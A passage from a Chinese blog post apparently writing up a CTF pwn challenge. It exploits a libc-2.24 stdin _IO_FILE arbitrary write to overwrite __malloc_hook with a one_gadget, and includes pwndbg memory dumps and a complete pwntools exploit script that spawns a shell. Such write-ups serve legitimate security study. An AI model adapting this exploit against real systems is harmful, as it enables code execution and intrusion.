<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">20</span>xg &amp; *<span class="built_in">stdin</span></span><br><span class="line"><span class="number">0x7f68f09198c0</span> &lt;_IO_2_1_stdin_&gt;:	<span class="number">0x00000000fbad208b</span>	<span class="number">0x00007f68f0919901</span></span><br><span class="line"><span class="number">0x7f68f09198d0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:	<span class="number">0x00007f68f0919908</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line">    <span class="comment">/* 注意一下_IO_read_ptr改变了 */</span></span><br><span class="line"><span class="number">0x7f68f09198e0</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f09198f0</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f0919900</span> &lt;_IO_2_1_stdin_+<span class="number">64</span>&gt;:	<span class="number">0x00007f68f0919af8</span>	<span class="number">0x0000000000000000</span></span><br><span class="line">    <span class="comment">/* malloc_hook + 8 已经写入 */</span></span><br></pre></td></tr></table></figure>
<p>当把 <code>_IO_buf_base</code> 覆盖为 <code>_IO_buf_end</code> 后，从键盘中输入的应该存放在缓冲区的数据，就会覆盖 <code>_IO_buf_base</code> 作为新的缓冲区结束地址，在这里写入 malloc_hook + 8 后，从键盘中输入的数据就会覆盖到 malloc_hook + 8 的位置，进而劫持 malloc</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">	p.sendline(<span class="string">&#x27;\x00&#x27;</span>) <span class="comment"># 可以用sendline,也可以用send</span></span><br><span class="line"></span><br><span class="line">payload = p64(malloc_hook + <span class="number">8</span>) + p64(<span class="number">0</span>)*<span class="number">6</span></span><br><span class="line">payload += p64(<span class="number">0xFFFFFFFFFFFFFFFF</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(libc_base + <span class="number">3946352</span>) + p64(<span class="number">0xFFFFFFFFFFFFFFFF</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(libc_base + <span class="number">3938720</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">3</span> + p64(<span class="number">0xFFFFFFFF</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span> + p64(libc_base + <span class="number">3924992</span>)</span><br><span class="line">payload += <span class="string">&#x27;\x00&#x27;</span>*<span class="number">304</span></span><br><span class="line">payload += p64(libc_base + <span class="number">3923648</span>) + p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">payload += p64(one_gadget) + p64(realloc)</span><br><span class="line">p.sendline(payload)</span><br></pre></td></tr></table></figure>
<p>刚开始我很不能理解这里循环输入“\x00”的作用</p>
<p>每从输入缓冲区读1个字节数据就将 <code>_IO_read_ptr</code> 加1，当 <code>_IO_read_ptr</code> 等于 <code>_IO_read_end</code> 的时候便会调用 <code>read</code> 读数据到 <code>_IO_buf_base</code> 地址中，而写入 malloc_hook + 8 的时候就导致了 <code>_IO_read_ptr</code> + 8 ，使得条件不成立： </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">20</span>xg &amp; *<span class="built_in">stdin</span></span><br><span class="line"><span class="number">0x7f68f09198c0</span> &lt;_IO_2_1_stdin_&gt;:	<span class="number">0x00000000fbad208b</span>	<span class="number">0x00007f68f0919901</span></span><br><span class="line"><span class="number">0x7f68f09198d0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:	<span class="number">0x00007f68f0919908</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line">    <span class="comment">/* 注意一下_IO_read_ptr改变了 */</span></span><br><span class="line"><span class="number">0x7f68f09198e0</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f09198f0</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f0919900</span> &lt;_IO_2_1_stdin_+<span class="number">64</span>&gt;:	<span class="number">0x00007f68f0919af8</span>	<span class="number">0x0000000000000000</span></span><br><span class="line">    <span class="comment">/* malloc_hook + 8 已经写入 */</span></span><br></pre></td></tr></table></figure>
<p>而循环输入8次“\x00”后：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">20</span>xg &amp; *<span class="built_in">stdin</span></span><br><span class="line"><span class="number">0x7f0af67948c0</span> &lt;_IO_2_1_stdin_&gt;:	<span class="number">0x00000000fbad208b</span>	<span class="number">0x00007f0af6794900</span></span><br><span class="line"><span class="number">0x7f0af67948d0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:	<span class="number">0x00007f0af6794900</span>	<span class="number">0x00007f0af6794900</span></span><br><span class="line"><span class="number">0x7f0af67948e0</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:	<span class="number">0x00007f0af6794900</span>	<span class="number">0x00007f0af6794900</span></span><br><span class="line"><span class="number">0x7f0af67948f0</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:	<span class="number">0x00007f0af6794900</span>	<span class="number">0x00007f0af6794900</span></span><br><span class="line"><span class="number">0x7f0af6794900</span> &lt;_IO_2_1_stdin_+<span class="number">64</span>&gt;:	<span class="number">0x00007f0af6794af8</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x7f0af6794910</span> &lt;_IO_2_1_stdin_+<span class="number">80</span>&gt;:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br></pre></td></tr></table></figure>
<p>发现 <code>_IO_read_ptr</code> 减回去了，分析源码得知：执行 fread 时会重置这些指针字段为 <code>_IO_buf_base</code> ，但是它有时不仅没有重置，反而会继续增加，而有时又会进行重置，不知道原因</p>
<p>完整exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">p=process(<span class="string">&#x27;./stackoverflow&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./stackoverflow&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc-2.24.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,padding</span>):</span></span><br><span class="line">	p.recvuntil(<span class="string">&#x27;please input the size to trigger stackoverflow: &#x27;</span>)</span><br><span class="line">	p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">	p.recvuntil(<span class="string">&#x27;padding and ropchain: &#x27;</span>)</span><br><span class="line">	p.send(padding)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;leave your name, bro:&#x27;</span>)</span><br><span class="line">p.send(<span class="string">&#x27;1&#x27;</span>*<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;worrier 11111111&#x27;</span>)</span><br><span class="line">leak_addr=u64(p.recvuntil(<span class="string">&#x27;,&#x27;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base=leak_addr-<span class="number">515410</span></span><br><span class="line">malloc_hook=libc_base+libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">realloc=libc_base+libc.sym[<span class="string">&#x27;realloc&#x27;</span>]</span><br><span class="line">success(<span class="string">&#x27;leak_addr &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(leak_addr))</span><br><span class="line">success(<span class="string">&#x27;libc_base &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">success(<span class="string">&#x27;malloc_hook &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(malloc_hook))</span><br><span class="line">success(<span class="string">&#x27;realloc &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(realloc))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;please input the size to trigger stackoverflow: &#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">0x5c28e8</span>))</span><br><span class="line">add(<span class="number">0x200000</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;please input the size to trigger stackoverflow: &#x27;</span>)</span><br><span class="line">p.send(p64(malloc_hook+<span class="number">8</span>))</span><br><span class="line"></span><br><span class="line">one_gadget_list=[<span class="number">0x45526</span>,<span class="number">0x4557a</span>,<span class="number">0xf0a51</span>,<span class="number">0xf18cb</span>]</span><br><span class="line">one_gadget=one_gadget_list[<span class="number">3</span>]+libc_base</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">	p.send(<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">	</span><br><span class="line">payload = p64(malloc_hook + <span class="number">8</span>) + p64(<span class="number">0</span>)*<span class="number">6</span></span><br><span class="line">payload += p64(<span class="number">0xFFFFFFFFFFFFFFFF</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(libc_base + <span class="number">3946352</span>) + p64(<span class="number">0xFFFFFFFFFFFFFFFF</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(libc_base + <span class="number">3938720</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">3</span> + p64(<span class="number">0xFFFFFFFF</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)*<span class="number">2</span> + p64(libc_base + <span class="number">3924992</span>)</span><br><span class="line">payload += <span class="string">&#x27;\x00&#x27;</span>*<span class="number">304</span></span><br><span class="line">payload += p64(libc_base + <span class="number">3923648</span>) + p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">payload += p64(one_gadget) + p64(realloc)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<hr>
<p><strong>小结：</strong></p>
<p>这道题算是经典的 stdin 任意写了，覆盖 _IO_buf_end 的操作很巧妙但也很巧合（仅限于libc-2.24），通过这题我算是把 stdin 任意写搞明白了，只是最后的操作真的有点迷，希望知道的大佬可以告诉我一下</p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/hook/" rel="tag"><i class="fa fa-tag"></i> hook</a>
              <a href="/tags/stdin-read/" rel="tag"><i class="fa fa-tag"></i> stdin read</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/04/02/IO_FILE%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9Astdin%E4%BB%BB%E6%84%8F%E5%86%99/" rel="prev" title="IO_FILE源码分析：stdin任意写">
      <i class="fa fa-chevron-left"></i> IO_FILE源码分析：stdin任意写
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/04/02/Python%E7%BD%91%E7%BB%9C%E6%95%B0%E6%8D%AE%E9%87%87%E9%9B%86/" rel="next" title="Python网络数据采集">
      Python网络数据采集 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="yhellow"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">yhellow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">244</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">140</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">yhellow</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">3.3m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">49:38</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  

</body>
</html>
